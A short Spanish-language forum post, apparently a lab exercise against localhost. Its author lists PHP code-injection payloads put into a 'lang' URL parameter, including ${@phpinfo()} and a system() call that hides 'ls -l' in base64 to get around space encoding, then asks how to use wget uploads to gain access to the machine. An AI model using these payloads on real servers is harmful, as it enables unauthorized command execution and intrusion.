Buenas.
Bueno pues estoy intentado utilizar un ataque php injection. Esta es mi situación:
1.-http://localhost/?lang=${@phpinfo()} FUNCIONA / http://localhost/?lang=http//localhost/phpinfo.txt NO FUNCIONA (obviamente tiene el código php para mostrar el phpinfo).
2.-Me puse a toquetear y a investigar http://localhost/?lang=${@system(ls -l)} NO FUNCIONA, al no funcionar me sale el típico error 500 y me añade %20 en la url (espacio).
Así que pensé en utilizar base64.
3.-http://localhost/?lang=${@system(base64_decode(bHMgLWw))} FUNCIONA
Ahora es aquí donde me atasco. Qué debería hacer para acceder a la máquina. He estado leyendo y hay que subir archivos con wget etc, pero es que no encuentro la fórmula de cómo poner la url ni que archivo subir.
Thanks.